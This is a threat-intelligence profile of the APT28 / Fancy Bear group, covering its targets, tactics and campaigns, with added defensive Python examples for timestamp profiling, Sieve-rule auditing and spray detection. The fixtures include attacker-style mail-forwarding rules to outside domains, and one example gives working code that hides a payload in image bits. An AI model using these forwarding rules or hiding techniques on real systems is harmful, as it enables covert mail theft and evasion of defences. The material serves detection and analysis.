Active threat profile
Type: Nation-State
Threat level: Critical
Status: Active
Origin: Russia
Last updated: 2026-04-17

APT28 / Fancy Bear

also known as: Sofacy, Strontium, Forest Blizzard, Pawn Storm, Sednit, IRON TWILIGHT, BlueDelta, Fighting Ursa, Storm-2754, TA422, ITG05, UAC-0028, FROZENLAKE, TG-4127, SNAKEMACKEREL

Russia's GRU Military Intelligence Unit 26165 has been active for over two decades and is responsible for some of the most consequential cyber operations on record: the 2016 DNC breach, election interference campaigns across multiple countries, sustained NATO targeting, the May 2025 campaign against Western logistics firms supporting Ukraine (formalized in a joint advisory from 21 agencies in 11 allied nations), Operation RoundPress, an ESET-documented webmail espionage campaign built around an MDaemon zero-day (CVE-2024-11182), Operation FrostArmada, a global router DNS hijacking campaign that peaked at 18,000 infected devices across 120 countries, and, in early 2026, the simultaneous exploitation of two unpatched Microsoft vulnerabilities alongside deployment of the PRISMEX malware suite against Ukraine and NATO allies.

Attributed origin: Russia
Suspected sponsor: GRU — Unit 26165 (85th GTsSS)
First observed: ~2004
Primary motivation: Espionage / political interference
Primary targets: Government, Defense, Political
Known campaigns: 25+ major confirmed
MITRE ATT&CK group: G0007
Target regions: Europe, USA, Ukraine (primary)
Threat level: CRITICAL

Overview

APT28 is one of the most prolific, well-resourced, and technically sophisticated nation-state threat actors ever documented. Operated by Russia's GRU military intelligence directorate — specifically the 85th Main Special Service Center (85th GTsSS), Military Unit 26165 — the group has been conducting offensive cyber operations since at least 2004, predating many of the security frameworks now used to defend against it. The U.S. Department of Justice indicted 12 GRU officers from Unit 26165 and its sister Unit 74455 in July 2018, providing some of the most detailed public attribution of any state-sponsored threat actor on record.

What distinguishes APT28 from comparable state-sponsored actors is the breadth of its operational objectives. Unlike groups focused narrowly on intelligence collection, APT28 simultaneously pursues espionage, political interference, disinformation support, and direct disruption of adversary systems. The group has attacked the French election, the German Bundestag, U.S. political campaigns, NATO member military networks, Western logistics companies, and Ukrainian critical infrastructure — frequently running multiple campaigns concurrently across different target sectors and geographies.

The group's technical tradecraft is particularly notable for its willingness to burn zero-days at scale and rapidly weaponize newly disclosed vulnerabilities. In early 2026, APT28 simultaneously exploited two unpatched Microsoft vulnerabilities — CVE-2026-21513 in MSHTML and CVE-2026-21509 in Microsoft Office — deploying the PRISMEX malware suite in a coordinated campaign active since September 2025. Trend Micro found that the LNK exploit sample for CVE-2026-21513 had appeared on VirusTotal on January 30, 2026, eleven days before Microsoft released its patch on February 10, 2026, establishing zero-day exploitation in the wild. Operating simultaneous zero-days signals high-priority targeting and significant intelligence resource expenditure.

2025 and early 2026 also saw two additional major documented operations. Operation FrostArmada, named by Lumen's Black Lotus Labs, ran from May 2025 and peaked in December 2025 with over 18,000 devices across 120 countries communicating with APT28's malicious DNS infrastructure. The FBI executed a court-authorized technical operation in April 2026 to disrupt it. Separately, Operation RoundPress, documented by ESET researcher Matthieu Faou, exploited XSS vulnerabilities across multiple webmail platforms — including a zero-day in MDaemon (CVE-2024-11182, CVSS 5.3) — to steal credentials and harvest emails from government and defense entities across Eastern Europe, Africa, and South America.

A May 2025 joint advisory (CISA AA25-141A), co-sealed by 11 allied nations and 21 intelligence agencies, formally detailed a sustained campaign targeting Western logistics and technology companies supporting Ukraine across air, sea, and rail transportation modes — including the compromise of RTSP-enabled cameras at Ukrainian border crossings and near military installations to physically monitor aid movement.

Denis Calderone, CTO of Suzu Labs, noted in April 2026 that a key aspect of APT28's operational profile is that its sophistication primarily manifests after initial access is achieved. Initial access methods — phishing, ClickFix social engineering, password spraying, exploitation of unpatched edge devices — remain consistent with what defenders encounter from less sophisticated actors. The distinction lies in what follows: long-dwell persistence, credential harvesting at scale, and precise intelligence collection aligned with GRU priorities.

One forensic detail rarely discussed outside specialist circles: FireEye's original 2014 attribution relied partly on the compile-time metadata embedded in APT28's malware binaries. Analysis showed the malware was compiled almost exclusively during a consistent window, Monday through Friday between 8am and 6pm in the UTC+4 time zone, which was Moscow's time zone until Russia moved it back to UTC+3 in October 2014, with a pronounced gap over Russian public holidays including Orthodox Christmas and New Year. This working-hours pattern, combined with Russian-language settings in the malware build environment and Cyrillic error strings in some variants, formed a core part of the original attribution before any human intelligence or government confirmation was available. FireEye director of threat intelligence Laura Galante summarized the group's activities as "state espionage" targeting both strategic adversaries and "media or influencers." These compile-time patterns still appear in more recent tooling variants where investigators have been able to analyze unstripped binaries. The caveat is that a PE compile timestamp is written by the build toolchain and can be set to any value, so it corroborates other evidence rather than proving origin on its own.
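Added example, not FireEye's own tooling: the working-hours heuristic described above, run over PE compile timestamps. It reads the COFF TimeDateStamp straight out of the PE header and scores several candidate UTC offsets by the fraction of builds that land on a weekday between 08:00 and 18:00. The PE stubs and timestamps are constructed for illustration and are not APT28 samples.

```python
"""Working-hours profiling of PE compile timestamps (added example, not from FireEye).

Reads the COFF TimeDateStamp from PE images, shifts it into candidate time zones
and reports what fraction of builds land on weekdays between 08:00 and 18:00.
The PE stubs and timestamps below are constructed for the example; they are not
APT28 artefacts.
"""
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone


def pe_compile_time(data: bytes) -> int:
    """Return the COFF TimeDateStamp (seconds since the Unix epoch) of a PE image.

    Layout: 'MZ' at offset 0, e_lfanew at 0x3c, then the 'PE\\0\\0' signature
    followed by the COFF file header, whose second dword is TimeDateStamp.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (timestamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return timestamp


def make_fake_pe(timestamp: int) -> bytes:
    """Build a minimal MZ/PE header carrying the given TimeDateStamp (test data only)."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 0, timestamp, 0, 0, 0, 0)
    return bytes(dos) + b"PE\0\0" + coff


def working_hours_profile(timestamps, utc_offset_hours, start_hour=8, end_hour=18):
    """Fraction of builds on Mon-Fri within [start_hour, end_hour) at the given
    UTC offset, plus an hour-of-day histogram for eyeballing the distribution."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    hist = Counter()
    in_window = 0
    for ts in timestamps:
        local = datetime.fromtimestamp(ts, tz)
        hist[local.hour] += 1
        if local.weekday() < 5 and start_hour <= local.hour < end_hour:
            in_window += 1
    return in_window / len(timestamps), hist


def compare_zones(blobs, offsets=(0, 3, 4, 8)):
    """Score several candidate zones; the zone with the highest weekday/working-hours
    fraction is the one the build machine most plausibly lived in."""
    stamps = [pe_compile_time(b) for b in blobs]
    return {off: working_hours_profile(stamps, off)[0] for off in offsets}


def _utc(year, month, day, hour, minute=0):
    return int(datetime(year, month, day, hour, minute, tzinfo=timezone.utc).timestamp())


# Constructed sample: four builds, chosen so that UTC+4 (Moscow time in early 2014)
# scores highest. These are not real APT28 timestamps.
SAMPLE_BUILDS = [make_fake_pe(t) for t in (
    _utc(2014, 3, 3, 5, 0),     # Monday 09:00 at UTC+4 (05:00 UTC)
    _utc(2014, 3, 4, 6, 0),     # Tuesday 10:00 at UTC+4
    _utc(2014, 3, 5, 13, 30),   # Wednesday 17:30 at UTC+4
    _utc(2014, 3, 8, 6, 0),     # Saturday: weekend in every candidate zone
)]

if __name__ == "__main__":
    for off, frac in sorted(compare_zones(SAMPLE_BUILDS).items()):
        print(f"UTC{off:+d}: {frac:.0%} of builds in Mon-Fri 08:00-18:00")
```

Run it over a corpus of a few hundred unstripped samples rather than four; the offset whose score peaks is the candidate, and neighbouring offsets will score almost as well, as UTC+3 does here. Treat the result as corroboration only: the field is attacker-controlled, some toolchains zero it for reproducible builds, and Delphi binaries carry a fixed 1992 stamp.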

warning

APT28 is known to maintain long-term dormant access in compromised networks, activating implants months or years after initial intrusion. Detection of one implant does not indicate full eviction. The FBI advisory on FrostArmada noted that rebooting a compromised router does not remove APT28's firmware modifications — a hardware factory reset is required.

Target Profile

APT28's targeting reflects GRU intelligence priorities: Western governments, NATO military infrastructure, political institutions, logistics networks, and Ukrainian entities. The group consistently targets organizations where access yields strategic intelligence or enables information operations. The May 2025 21-agency advisory confirmed the group's expanded focus on Western logistics and technology firms spanning air, sea, and rail transport modes — any organization handling the physical flow of aid to Ukraine is considered in-scope.

  • Government and diplomatic: Foreign ministries, embassies, and senior officials across Europe and North America. The German Bundestag breach (2015) compromised Parliament's IT systems, requiring a full rebuild. The May 2025 advisory confirmed ongoing targeting of foreign ministries and government agencies across at least 13 countries, including the U.S., Germany, France, Poland, Ukraine, Bulgaria, Czechia, Greece, Italy, Moldova, the Netherlands, Romania, and Slovakia.
  • Defense and military: NATO member defense ministries, contractors, defense industrial base, and military research institutions. The 2025 advisory noted APT28 targeted at least one manufacturer of industrial control system components for railway operations, and defense companies in Bulgaria and Romania producing Soviet-era weapons destined for Ukraine.
  • Political parties and campaigns: DNC and Clinton campaign (2016), Macron's En Marche campaign (2017), multiple European political parties. Stolen data is typically leaked to maximize political damage. France attributed a series of attacks on French entities since 2021, including entities linked to the 2024 Paris Olympics, to APT28.
  • Logistics and supply chain: A 2022–2025 campaign documented in CISA AA25-141A targeted trucking companies, port authorities, air traffic management systems, maritime operators, warehouse and customs management providers, GPS routing systems, and technology companies enabling Ukraine aid logistics. The goal was intelligence collection and potential sabotage of the aid flow.
  • Physical surveillance via camera hijacking: Since March 2022, APT28 has compromised RTSP-enabled IP cameras at Ukrainian border crossings, railway stations, military installations, and key road junctions — using default and brute-forced credentials — to physically monitor the movement of military and humanitarian aid into Ukraine.
  • Webmail and email systems: Operation RoundPress (documented by ESET, May 2025) targeted government entities and defense companies using Roundcube, Horde, MDaemon, and Zimbra webmail infrastructure via XSS exploitation. Primary victims included Ukrainian governmental entities and defense companies in Bulgaria, Romania, Greece, Serbia, Cyprus, Ecuador, and Cameroon.
  • Home and small office networking infrastructure: Operation FrostArmada (May 2025 – April 2026) targeted MikroTik and TP-Link routers in 120+ countries to build passive credential harvesting infrastructure targeting Microsoft 365 accounts of government agencies, law enforcement, and IT/cloud providers.
  • Media and think tanks: Organizations that shape Western policy and public opinion — access enables both intelligence collection and potential influence operations.

Tactics, Techniques & Procedures

Spear-phishing: Highly targeted emails with malicious Office documents or LNK files, customized with victim-relevant content and geopolitical lures (e.g., Ukrainian drone inventories, military training documents, aid logistics). Primary initial access vector across all documented campaigns.

Vulnerability exploitation: Zero-day exploitation including simultaneous dual-vector campaigns (CVE-2026-21513 MSHTML + CVE-2026-21509 Office in the 2026 PRISMEX campaign). Also: CVE-2023-23397 (Outlook NTLM hash leak), CVE-2024-11182 (MDaemon XSS zero-day, Operation RoundPress), CVE-2023-43770 (Roundcube XSS), CVE-2023-38831 (WinRAR), CVE-2023-50224 (TP-Link auth bypass, FrostArmada).

Process injection and in-memory execution: X-Agent (CHOPSTICK), the PRISMEX loader, and newer implants inject into legitimate processes to evade endpoint detection. PRISMEX implements fileless execution via in-memory payload staging.

Cloud-fronted command and control: Command-and-control over HTTPS abusing legitimate cloud services. PRISMEX uses Filen.io for encrypted C2, making traffic blend with normal web activity; Trellix confirmed APT28 uses cloud storage infrastructure for key exchange in 2026 operations.

Credential harvesting: Mimikatz and custom variants to harvest credentials for lateral movement. FrostArmada extended credential harvesting to the SOHO router layer, passively collecting NTLMv2 digests, OAuth tokens, and Microsoft 365 passwords from DNS-intercepted authentication traffic.

Email collection and mailbox persistence: Systematic collection of email archives from compromised accounts is a core collection objective. Operation RoundPress's SpyPress payloads exfiltrate full mailbox contents, contact books, and login history. SpyPress.ROUNDCUBE creates persistent Sieve forwarding rules that keep delivering mail to the attacker after the injected script is gone.
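Added example, not from ESET or the SpyPress analysis: an audit of ManageSieve scripts for the forwarding persistence just described, flagging `redirect` actions whose destination is a domain the organisation does not own. The sample scripts and the trusted domain list are constructed.

```python
"""Audit Sieve scripts for attacker-added forwarding rules (added example).

SpyPress.ROUNDCUBE persists by writing a Sieve `redirect` rule, so mail keeps
flowing to the attacker after the injected JavaScript is gone. This scans
script text fetched over ManageSieve for redirect actions whose destination
is outside the organisation's own mail domains. Sample scripts are constructed.
"""
import re

# redirect [:copy] [:list] "address";   (tags are optional). Multi-line `text:`
# string literals are not handled; treat any script that uses them as needing review.
_REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;', re.IGNORECASE)
_COMMENT = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)


def strip_comments(script: str) -> str:
    """Drop # and /* */ comments so a commented-out redirect is not reported."""
    return _COMMENT.sub("", script)


def redirect_targets(script: str):
    """Return (address, is_copy) for each redirect action in a Sieve script.
    :copy keeps the original in the mailbox, so the victim sees nothing missing."""
    found = []
    for m in _REDIRECT.finditer(strip_comments(script)):
        tags, addr = m.group(1), m.group(2)
        found.append((addr, ":copy" in tags.lower()))
    return found


def suspicious_redirects(script: str, trusted_domains):
    """Redirects whose destination domain is not one the organisation controls."""
    trusted = {d.lower() for d in trusted_domains}
    findings = []
    for addr, is_copy in redirect_targets(script):
        domain = addr.rsplit("@", 1)[1].lower() if "@" in addr else ""
        if domain not in trusted:
            findings.append({"address": addr, "copy": is_copy})
    return findings


def audit(scripts_by_user, trusted_domains):
    """Map user -> findings, for users with at least one suspicious redirect."""
    report = {}
    for user, script in scripts_by_user.items():
        hits = suspicious_redirects(script, trusted_domains)
        if hits:
            report[user] = hits
    return report


# Constructed sample scripts, as returned by a ManageSieve GETSCRIPT for each user.
SAMPLE_SCRIPTS = {
    "alice": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n'
    ),
    "bob": (
        'require ["copy"];\n'
        '# forwarding rule\n'
        'if true { redirect :copy "archive-sync@mail-backup-service.example"; }\n'
        'keep;\n'
    ),
    "dave": (
        'require ["copy"];\n'
        '# redirect "old@evil.example";   (commented out, must not be reported)\n'
        'redirect "helpdesk@corp.example";\n'
    ),
}

if __name__ == "__main__":
    for user, hits in audit(SAMPLE_SCRIPTS, ["corp.example"]).items():
        for hit in hits:
            print(f"{user}: redirect to {hit['address']} (copy={hit['copy']})")
```

Feed it every user's active script; a `:copy` redirect is the quiet variant because the mailbox still receives the message. List subsidiaries and mail-relay domains as trusted, or a legitimate forward will be reported alongside the malicious one.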

Lookalike login portals and DNS spoofing: Registers domains closely mimicking targets' legitimate web-based email and login portals for credential phishing. FrostArmada extended this to DNS-level spoofing, returning fraudulent DNS records for Microsoft Outlook on the web and other services.

Steganography: Extensive use of steganography, documented in the BadPaw/MeowMeow and PRISMEX campaigns, to hide encrypted payloads in image files. PRISMEX uses custom steganography alongside COM hijacking to achieve persistence and evade modern security tooling.
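Added example, a toy of the PRISMEX scheme described under Tools & Malware and not PRISMEX's own code: payload bytes go into the low bit of every channel byte of an RGBA pixel buffer, and the payload is Base64 wrapped in certificate banners so it passes as X.509 data. The AES layer is omitted, and the pixel buffer and payload are constructed. The last function is the check a scanner can apply to the banner trick: a real PEM certificate decodes to one DER SEQUENCE whose declared length spans the whole blob, and the masquerade does not.

```python
"""Least-significant-bit payload hiding and a PEM sanity check (added example).

Toy version of the PRISMEX scheme: one payload bit per cover byte, a payload
dressed up as a PEM certificate, and the structural check that tells real
certificate data from the masquerade. Cover and payload are constructed here.
"""
import base64
import textwrap


def embed_lsb(pixels: bytes, payload: bytes) -> bytes:
    """Write len(payload) (4 bytes, big-endian) then payload, one bit per cover byte."""
    data = len(payload).to_bytes(4, "big") + payload
    if len(data) * 8 > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for i, byte in enumerate(data):
        for bit in range(8):
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def extract_lsb(pixels: bytes) -> bytes:
    """Inverse of embed_lsb: read the length prefix, then that many payload bytes."""
    def read(count, offset):
        buf = bytearray()
        for i in range(count):
            b = 0
            for bit in range(8):
                b = (b << 1) | (pixels[offset + i * 8 + bit] & 1)
            buf.append(b)
        return bytes(buf)
    length = int.from_bytes(read(4, 0), "big")
    return read(length, 32)


def fake_cert_pem(raw: bytes) -> str:
    """Wrap arbitrary bytes in certificate banners, as the loader's payload does."""
    body = textwrap.fill(base64.b64encode(raw).decode(), 64)
    return f"-----BEGIN CERTIFICATE-----\n{body}\n-----END CERTIFICATE-----\n"


def pem_body(text: str):
    """Base64-decode the material between the banners; None if not well-formed."""
    begin, end = "-----BEGIN CERTIFICATE-----", "-----END CERTIFICATE-----"
    if begin not in text or end not in text:
        return None
    inner = text.split(begin, 1)[1].split(end, 1)[0]
    try:
        return base64.b64decode("".join(inner.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def looks_like_der_sequence(der) -> bool:
    """True when der is a single ASN.1 SEQUENCE whose length header spans the
    whole blob, which every X.509 certificate satisfies and random bytes do not."""
    if not der or len(der) < 2 or der[0] != 0x30:
        return False
    first = der[1]
    if first < 0x80:                       # short-form length
        length, header = first, 2
    elif 0x81 <= first <= 0x84:            # long form, 1-4 length bytes
        n = first & 0x7F
        if len(der) < 2 + n:
            return False
        length, header = int.from_bytes(der[2:2 + n], "big"), 2 + n
    else:
        return False
    return header + length == len(der)


# Constructed cover: 1024 channel bytes (256 RGBA pixels) and a payload that
# masquerades as a certificate. Not a real image and not PRISMEX's payload.
COVER = bytes(range(256)) * 4
PAYLOAD = fake_cert_pem(bytes(range(0xA0, 0xC8))).encode()

if __name__ == "__main__":
    stego = embed_lsb(COVER, PAYLOAD)
    recovered = extract_lsb(stego)
    print("recovered payload matches:", recovered == PAYLOAD)
    print("PEM body is a DER SEQUENCE:", looks_like_der_sequence(pem_body(recovered.decode())))
```

The DER check is deliberately cheap: it does not parse the certificate, it only rejects blobs whose first bytes cannot be a SEQUENCE header for the blob's own length, which is exactly what a Base64-wrapped ciphertext fails. Pair it with a size threshold, since a 300 KB "certificate" is suspicious on its own.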

MFA bypass via application passwords: SpyPress.MDAEMON (Operation RoundPress) bypasses two-factor authentication by exfiltrating 2FA secrets and creating application passwords, maintaining mailbox access even after password and 2FA code changes.

Password spraying: Microsoft documents Forest Blizzard deploying automated password spray tooling routed through Tor. The May 2025 multi-agency advisory highlighted reconstituted password spraying capabilities as a primary initial access vector alongside spear-phishing.
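Added example, not Microsoft's or the advisory's detection logic: a spray detector run over constructed authentication log lines. A spray touches many accounts with one or two guesses each, so per-account lockout never fires; the detector instead counts, inside a sliding window, the accounts that failed only a few times. Grouping by source IP catches a single spraying host, and grouping globally with a minimum source count catches the Tor-routed variant. The log format is an assumption.

```python
"""Password-spray detection over authentication logs (added example).

Groups failed logins, slides a time window over them and counts accounts that
failed at most a couple of times. group_by_source=False pools all sources and
catches sprays spread across many exit nodes (for instance Tor) at the cost of
requiring a minimum number of distinct sources. Log lines are constructed and
their 'timestamp src=IP user=NAME result=OK|FAIL' format is an assumption.
"""
import re
from collections import Counter, defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts src user result")
_LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")


def parse_auth_log(lines):
    """Parse log lines into Events sorted by time; unrelated lines are skipped."""
    events = []
    for line in lines:
        m = _LINE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append(Event(ts, m["src"], m["user"].lower(), m["result"].upper()))
    return sorted(events)


def detect_spray(events, group_by_source=True, window=timedelta(minutes=30),
                 min_users=5, max_per_user=2, min_sources=1):
    """One alert per group whose best window holds >= min_users accounts that
    each failed <= max_per_user times, coming from >= min_sources source IPs."""
    groups = defaultdict(list)
    for ev in events:
        if ev.result != "OK":
            groups[ev.src if group_by_source else "*"].append(ev)

    alerts = []
    for key, fails in groups.items():
        best = None
        left = 0
        for right in range(len(fails)):
            while fails[right].ts - fails[left].ts > window:
                left += 1
            win = fails[left:right + 1]
            per_user = Counter(e.user for e in win)
            sprayed = {u for u, n in per_user.items() if n <= max_per_user}
            if best is None or len(sprayed) > best[0]:
                best = (len(sprayed), win, sprayed)
        count, win, sprayed = best
        sources = {e.src for e in win if e.user in sprayed}
        if count >= min_users and len(sources) >= min_sources:
            alerts.append({"group": key, "users": sorted(sprayed), "sources": len(sources),
                           "first": win[0].ts, "last": win[-1].ts})
    return alerts


# Constructed sample: one host spraying six accounts, a user (carol) who mistypes
# her password four times and then succeeds, and five single-guess failures from
# five different addresses that only stand out when sources are pooled.
SAMPLE_LOG = """\
2025-05-02T08:00:01Z src=203.0.113.7 user=a.adams result=FAIL
2025-05-02T08:01:14Z src=203.0.113.7 user=b.baker result=FAIL
2025-05-02T08:02:30Z src=203.0.113.7 user=c.clark result=FAIL
2025-05-02T08:03:47Z src=203.0.113.7 user=d.dunn result=FAIL
2025-05-02T08:05:02Z src=198.51.100.20 user=carol result=FAIL
2025-05-02T08:05:09Z src=203.0.113.7 user=e.evans result=FAIL
2025-05-02T08:05:40Z src=198.51.100.20 user=carol result=FAIL
2025-05-02T08:06:11Z src=198.51.100.20 user=carol result=FAIL
2025-05-02T08:06:30Z src=203.0.113.7 user=f.fox result=FAIL
2025-05-02T08:07:02Z src=198.51.100.20 user=carol result=FAIL
2025-05-02T08:07:20Z src=198.51.100.20 user=carol result=OK
2025-05-02T08:12:05Z src=192.0.2.11 user=g.gray result=FAIL
2025-05-02T08:14:10Z src=192.0.2.12 user=h.hill result=FAIL
2025-05-02T08:16:22Z src=192.0.2.13 user=i.ivers result=FAIL
2025-05-02T08:18:30Z src=192.0.2.14 user=j.jones result=FAIL
2025-05-02T08:20:45Z src=192.0.2.15 user=k.king result=FAIL
"""

if __name__ == "__main__":
    evts = parse_auth_log(SAMPLE_LOG.splitlines())
    for alert in detect_spray(evts) + detect_spray(evts, group_by_source=False, min_sources=3):
        print(f"{alert['group']}: {len(alert['users'])} accounts from {alert['sources']} sources "
              f"between {alert['first']:%H:%M} and {alert['last']:%H:%M}")
```

Thresholds are the tuning knobs: a large tenant needs a higher min_users for the pooled mode or normal morning typos will trip it, and the window should be widened for low-and-slow sprays. Counting only accounts with few failures, rather than requiring every account in the window to have few, is what keeps carol's four typos from masking the spray around her.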

Firmware-level persistence: LoJax, first documented by ESET in 2018, is APT28's UEFI rootkit, the first UEFI rootkit attributed to a nation-state actor and seen in the wild. It survives OS reinstallation and hard drive replacement, requiring firmware-level remediation. FrostArmada's router modifications similarly survived reboots; per the FBI advisory, only a factory reset removes them.

Trusted-relationship compromise: Compromise of software update mechanisms and trusted third-party services to deliver implants to downstream targets. The May 2025 advisory noted APT28 exploited trust relationships between primary targets and their business partners to expand access to additional organizations.

Nearest Neighbor WiFi pivot: In February 2022, APT28 obtained enterprise WiFi credentials via password spraying, then pivoted through adjacent buildings' networks when MFA blocked direct use over the internet. It daisy-chained through dual-homed devices in neighboring organizations to reach the target's WiFi access points, a close-access operation conducted remotely from Russia. Documented by Volexity as the "Nearest Neighbor Attack" (MITRE Campaign C0051).

Privilege escalation and forced authentication: GooseEgg exploits CVE-2022-38028 (Windows Print Spooler, NSA-reported, patched October 2022) to achieve SYSTEM-level execution by modifying a JavaScript constraints file; Microsoft confirmed use since at least June 2020. CVE-2023-23397 (Outlook zero-day, CVSS 9.8) leaks NTLMv2 credentials via an automatic connection to an attacker-controlled UNC path triggered by calendar appointment reminders, with no user interaction required.

Known Campaigns

PRISMEX — Multi-Stage Espionage & Disruption Against Ukraine and NATO Allies (2025–2026)

Active since September 2025 and peaking January–April 2026, this campaign was documented by Trend Micro and attributed to APT28 with high confidence. The PRISMEX malware suite (PrismexSheet, PrismexDrop, PrismexLoader, PrismexStager) is delivered via spear-phishing emails themed around military training and aid logistics, exploiting CVE-2026-21509 and CVE-2026-21513. The suite uses custom steganography, COM hijacking, and encrypted C2 via Filen.io to enable fileless execution. Lure documents included realistic Ukrainian drone inventories and military supplier price lists. Notably, PRISMEX includes both espionage and sabotage (wiper) capabilities — Trend Micro assessed the operation marks a shift toward tactical disruption alongside intelligence collection. Targets include Ukrainian defense, government, emergency services, and hydrometeorology, as well as logistics hubs in Poland, Romania, and Slovakia. A 72-hour concentrated spear-phishing burst January 28–30, 2026 delivered at least 29 distinct emails across nine Eastern European nations.

Operation FrostArmada — Global SOHO Router DNS Hijacking for Credential Theft (2025–2026, disrupted April 2026)

Named by Lumen's Black Lotus Labs, FrostArmada began in May 2025 and reached peak activity in December 2025 with over 18,000 unique IP addresses across 120+ countries communicating with APT28-controlled DNS infrastructure. The campaign compromised MikroTik and TP-Link SOHO routers — exploiting CVE-2023-50224 (TP-Link WR841N authentication bypass) — and modified DNS settings to redirect authentication traffic through adversary-in-the-middle (AitM) nodes, harvesting Microsoft 365 passwords, OAuth tokens, and NTLMv2 digests without deploying any endpoint malware. Microsoft confirmed AitM attacks against Microsoft Outlook on the web subdomains. The operation ran two parallel branches: one for device compromise and botnet growth, one for credential collection. An estimated 200+ organizations and 5,000 consumer devices were impacted. The FBI executed a court-authorized operation in April 2026 to disrupt the infrastructure via DNS resets on affected routers.

Operation RoundPress — Webmail XSS Espionage Including MDaemon Zero-Day (2023–2025)

Documented by ESET researcher Matthieu Faou (published May 2025), Operation RoundPress exploited XSS vulnerabilities in Roundcube (CVE-2023-43770), Horde, MDaemon, and Zimbra (CVE-2024-27443) to inject malicious JavaScript (the SpyPress family of payloads) into victims' webmail sessions without any additional user interaction beyond opening the email. CVE-2024-11182, the MDaemon zero-day (CVSS 5.3), was patched in MDaemon version 24.5.1 on November 14, 2024 — after ESET disclosed it to the vendor on November 1, 2024. SpyPress.MDAEMON could bypass two-factor authentication by extracting the 2FA secret and creating an application password, maintaining persistent mailbox access even after credential changes. Primary victims were Ukrainian governmental entities and defense companies in Bulgaria and Romania producing Soviet-era weapons for Ukraine, with secondary targets in Greece, Serbia, Cyprus, Ecuador, and Cameroon. CISA added CVE-2024-11182 to its Known Exploited Vulnerabilities catalog on May 19, 2025.

Logistics & Supply Chain Espionage — NATO Aid Infrastructure Targeting (2022–2025)

Formalized in CISA Advisory AA25-141A, issued May 21, 2025 by 21 intelligence and security agencies from 11 allied nations (the United States, the United Kingdom, Germany, France, Canada, Australia, the Czech Republic, Poland, Denmark, Estonia, and the Netherlands). The campaign targeted Western logistics entities and technology companies supporting Ukraine across air, sea, and rail transport, including defense contractors, port authorities, air traffic management systems, maritime operators, and warehouse management providers. APT28 exploited trust relationships between primary targets and their business partners to expand access. The advisory confirmed APT28 compromised RTSP-enabled IP cameras at Ukrainian border crossings, railway stations, and near military installations using default and brute-forced credentials to physically monitor aid movement. NCSC Director of Operations Paul Chichester stated the campaign posed "a serious risk to targeted organizations, including those involved in the delivery of assistance to Ukraine."

Dual Zero-Day Campaign — CVE-2026-21513 & CVE-2026-21509 (early 2026)

APT28 simultaneously exploited two unpatched Microsoft vulnerabilities — a MSHTML rendering engine flaw and a Microsoft Office security feature bypass — in a coordinated two-pronged campaign against government and defense targets in Ukraine, Slovakia, and Romania. Three distinct payload chains deployed including MiniDoor, PixyNetLoader, and BEARDSHELL. The LNK exploit for CVE-2026-21513 appeared on VirusTotal eleven days before Microsoft's February 10, 2026 patch, confirming zero-day exploitation in the wild. Trellix confirmed the campaign's multi-stage infection chain, noting the tradecraft reflected "a well-resourced, advanced adversary consistent with APT28's profile."

BadPaw / MeowMeow — Ukraine Espionage Campaign (2026)

ClearSky documented a sophisticated multi-stage espionage campaign deploying two previously undocumented malware families — BadPaw (.NET loader) and MeowMeow (backdoor) — against Ukrainian organizations. The operation used steganography to hide payloads in image files, implemented sandbox evasion, and used geopolitically tailored lures. Russian-language artifacts and targeting profile link the campaign to APT28 with high confidence.

U.S. Election Interference — DNC / Podesta Breach (2016)

Compromised the Democratic National Committee and John Podesta's email through spear-phishing, exfiltrating thousands of emails subsequently released via WikiLeaks and DCLeaks. The operation was designed not just for intelligence collection but to influence the U.S. presidential election. A Mueller investigation grand jury indicted 12 GRU officers from Units 26165 and 74455 in July 2018, and in October 2018 the U.S. Department of Justice charged seven Unit 26165 officers (three of them already named in July) over related hacking and influence operations targeting WADA, USADA, the OPCW, the Spiez laboratory, and Westinghouse Electric, a U.S. nuclear power company.

Operation Sofacy — German Bundestag Breach (2015)

Compromised the IT systems of the German Parliament, exfiltrating approximately 16 gigabytes of data over several weeks. The breach required a complete rebuild of Parliament's IT infrastructure. German authorities formally attributed the attack to APT28/GRU in May 2020. The same period saw the April 2015 attack on France's TV5 Monde television station, which security researchers including FireEye linked to APT28.

Olympic Destroyer / 2018 Winter Olympics (2018)

Destructive wiper malware deployed against the Winter Olympics opening ceremony in Pyeongchang, South Korea, deliberately seeded with false-flag indicators pointing to North Korea's Lazarus group and to Chinese actors. The wiper itself was attributed by the U.S. Department of Justice (October 2020 indictment) and the UK to GRU Unit 74455 (Sandworm), the sister unit of 26165, so APT28's documented role in the Olympics context is the surrounding anti-doping campaign rather than the wiper: the October 2018 indictment covered APT28's attacks against WADA (releasing medical records of athletes including Simone Biles and Serena Williams), the OPCW, and the Spiez Swiss Chemicals Laboratory.

2017 French Election — Macron Campaign Targeting (2017)

APT28 targeted Emmanuel Macron's En Marche campaign ahead of the French presidential election, conducting credential phishing campaigns and attempting to compromise campaign communications. France's ANSSI has since documented sustained APT28 targeting of French entities, including a 2023 campaign against French public and private sector organizations and entities connected to the 2024 Paris Olympics.

LAMEHUG — First Documented LLM-Integrated Malware (2025)

